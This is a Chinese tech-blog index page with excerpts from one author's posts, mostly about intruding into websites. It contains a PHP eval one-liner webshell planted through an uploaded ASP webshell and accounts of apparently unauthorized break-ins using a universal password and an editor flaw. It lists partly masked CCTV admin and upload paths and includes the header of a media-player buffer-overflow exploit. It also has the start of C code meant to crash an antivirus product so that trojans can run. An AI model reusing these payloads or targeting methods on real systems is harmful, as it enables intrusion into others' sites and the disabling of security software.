51CTO博客开发邵程程的有朝一日
哪些留给我们深刻印象的网站,硅谷、太平洋、中关村、168、小熊、天极,浓厚技术氛围气息遗失的美好!
初升的太阳照在脸上 也照着身旁这棵小树 亲爱的伙伴 亲爱的小树和我共享阳光雨露 让我们记住这美好时光直到长成参天大树
上传了个AspWebshell居然执行了代码,便想到利用它来包含生成PHP一句话。 具体说就是利用ASP语句嵌入创建一句话php版 代码内容: 例:<?php fputs(fopen(./p_w_upload/201011/x,w),<?eval($_POST[isun0804]);?>)?> 执行后在p_w_upload/201011/目录下生成x
最近心情烦闷,在网上找了很久发现符合自己要求的工作没几个要么就是学历太高(“211工程”毕业)要么就是没啥技术含量只适合混不能久做。无聊得很顺手选了两个网站做下测试以下简称1号与2号 1号站国家某科研机构曾获多项专利,大概看了下好像没什么问题,于是发动搜索引擎居然存在线文件编辑器漏洞并且有人已经来过了,进入webshell试了下万能密码结果成功并进行相关分析得出结论Win
NO.10 “上班时间聊天、煲电话,甚至干私事” ★ 大学生都这样简称大学流,不过女生较多如此。 天底下没有一个老板愿意雇用一个上班时间一直干私事或谈山海经的员工,天底下也没有一份既可以让你上班时自由自在、为所欲为,又可以领到高薪的工作。如果被你找到这么一份舒适的工作,那你一定是史上最“幸运”的人了! 注:国企都这样 N
起因:今天在网上闲逛时看到了万网G享主机的广告于是乎就有了下面的结果,路过留了个纪念! 无意得到一个网站的数据库信息里有 百度了一下发现为万网G享主机数据库链接地址 mysql:dmc-01.hichina.com 网上下了工具连上看看 发现已经有人来过了今年5月6日17点5分左右,还在网站里传了两个马。 思来想去觉得涂鸦挂马劫持之类的没什么意思,写在博客里给大家提个醒,网络安全意
0DAY代码: From:digua # Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit# EDB-ID: 12516# CVE-ID: ()# OSVDB-ID: ()# Author: Lufeng Li and Qingshan Li# Published: 2010-05-06# Verified: no
爆库地址:http://****.cctv.com/ChinvanAdmin/ckfinder/后台地址:http://****.cctv.com/ChinvanAdmin/login.aspx文件上传地址:http://****.cctv.com/ChinvanAdmin/ckfinder/ckfinder.html 有图为证: PS:此漏洞真的很弱智,天下程序一大抄,拿过来就用也不看是否安
近日,微软公司证实IE浏览器存在一个“F1按键”漏洞,大家近期上网时尽量不要按“F1”键,否则有可能触发木马攻击;这个“F1按键”漏洞存在于IE6、IE7、IE8浏览器中,目前微软尚未提供补丁。原理是通过IE浏览器和“Windows帮助程序”互动时的漏洞来实施的。F1按键本来用于快速打开帮助菜单,此时却变成了黑客设下的圈套,黑客利用伪装的“帮助”程序诱使用户按下F1键后,即可通过该漏洞执行恶意代码
磁盘主引导记录(MBR)简介: MBR(Master Boot Record),中文意为主引导记录。电脑开机后,主板自检完成后,被第一个读取到的磁盘位置。硬盘的0磁道的第一个扇区称为MBR,它的大小是512字节,它是不属于任何一个操作系统,也不能用操作系统提供的磁盘操作命令来读取。DOS时代泛滥成灾的引导区病毒多寄生于此。 电脑系统开机过程介绍: 开启电源开机自检-->主板BI
漏洞简介:向瑞星内存地址不断写入代码使其出错退出,木马病毒首选测试代码: DWORD GetProcessIdFromName(LPCTSTR name) { PROCESSENTRY32 pe; DWORD id = 0; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); pe.dwSize = si
记得N年以前一起住并在同一家培训中心学习的一个本科男,在三好街上班他所在公司有块硬盘挂到机器上不能用看不到硬盘分区但是BISO可以检测到,拿回家当时它的电脑系统是win98挂上就好用了。结果呢他公司的技术经理就问你怎么解决的,他说放到机器上就好用了我的机器是win98系统,结果呢技术经理认为系统换成win98的就能解决了技术经理就安装了win98把被锁的硬盘挂上了但还与以前一样,又问他这怎么回事,
域名注册服务商Register.com存在安全漏洞,在未经授权在情况可更改域名相关信息。要是早知道百度的域名注册服务商是它早就黑了,没想到百度选像大萝卜一样脆像熟牛肉一样有味道肉包子打狗一去复返的域名注册服务商无语,说实在的这个漏洞存在有三五年了至少我发现的时候是这个样子也许更早些,当然不只这一个还有很多漏洞。比较严重的一个漏洞差不多会导致半数以上的人上不了网也许更糟,与根服务器互联网节点有些关系
这是刚过年不久渗透测试,居然只花了22分钟.....就成功了做安全的公司服务器很不幸的是豆腐渣工程!不想说太多 PS:.NET为啥就那么脆呢,难道它是一盘大萝卜!
Copyright © 2005-2025 51CTO.COM 版权所有 京ICP证060544号